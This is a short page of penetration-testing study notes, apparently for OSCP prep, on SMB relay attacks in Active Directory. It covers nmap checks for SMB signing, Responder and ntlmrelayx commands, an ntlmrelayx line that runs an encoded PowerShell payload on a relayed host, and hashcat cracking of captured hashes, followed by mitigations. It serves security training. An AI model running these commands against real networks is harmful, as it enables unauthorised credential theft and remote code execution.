// notes/ Active Directory
🏛️
Initial Attack Strategy SMB Relay
Instead of cracking the captured hashes, we can instead relay those hashes to specific machines and potentially gain access.
#active directory#adot8
source · oscp.adot8.com · active-directory/initial-attack-strategy_smb-relay ↗SMB Relay
Overview
Instead of cracking the captured hashes, we can instead relay those hashes to specific machines and potentially gain access.
However, SMB signing MUST BE DISABLED or NOT ENFORCED on target and the relayed credentials must be local administrator on the machine for any real value
Identify Hosts Without SMB Signing
bash
$nmap --script=smb2-security-mode.nse -p445 192.168.1.0/24Desired Output
bash
$PORT STATE SERVICE$445/tcp open microsoft-ds$ $Host script results:$| smb2-security-mode:$| 3:1:1:$|_ Message signing enabled but not requiredEdit Responder Configuration File
bash
$sudo vim /etc/responder/Responder.conf$ $SMB = off$HTTP = offResponder + SMB Relay
bash
$sudo responder -I etho0 -dwv$ $impacket-ntlmrelayx -tf targets.txt -smb2supportExisting Shell + SMB Relay
code
01ntlmrelayx.py --no-http-server -smb2support -t 192.168.186.212 -c "powershell -e JABPE..."02 03net use "\\192.168.45.237\share"Crack SAM Hashes
bash
$hashcat -m 1000 crackme.txt ~/rockyou.txt -OMitigation
- Enable SMB Signing on all devices
- Pro: Completely stops the attacks
- Con: Performance issues may arise with file copies
- Disable NTLM authentication on the Network
- Pros: Completely stops the attack
- Con: If Kerberos stops working, Windows defaults back to NTLM
- Limit Domain Admins for specific tasks
- Local Administrator restrictions